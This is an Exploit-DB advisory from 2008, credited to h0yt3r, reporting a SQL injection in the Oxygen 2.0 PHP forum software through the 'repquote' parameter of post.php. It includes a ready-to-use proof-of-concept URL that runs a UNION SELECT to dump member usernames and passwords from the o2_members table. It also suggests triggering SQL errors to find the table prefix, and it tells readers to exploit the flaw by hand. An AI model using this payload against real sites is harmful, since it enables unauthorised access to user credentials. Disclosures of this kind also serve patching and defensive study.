Oxygen 2.0 - 'repquote' SQL Injection

EDB-ID:

5828


Platform:

PHP

Published:

2008-06-15

######################
#
#Oxygen 2.0 SQL Injection Vulnerability
#
######################
#
#Bug by: h0yt3r
#
##
###
##
#
#This Board Software suffers from a not correctly verified quote ID variable which is used in SQL Querys.
#An Attacker can easily get sensitive information from the database by
#injecting unexpected SQL Querys.
#We need a valid topic ID.
#Im not bored enough to code an exploit for this, so do it manually.
#Its by the way easy to find the correct prefix for the tables by producing a SQL Error.
#When injected your Query you can find the output in the Subject Text Box.
#
#SQL Injection:
#http://[target]/[path]/post.php?action=reply&tid=2517&repquote=[Sequel]
#
#PoC:
#post.php?action=reply&tid=2517&repquote=-1'%20union%20select%20concat(username,0x3a,password),2,3,4,5,6%20from%20o2_members--+
#
#######################
#
#Greetz to b!zZ!t, ramon, thund3r, Free-Hack, Sys-Flaw and of course the (...) h4ck-y0u Team!
#
#######################
####################### 

# milw0rm.com [2008-06-15]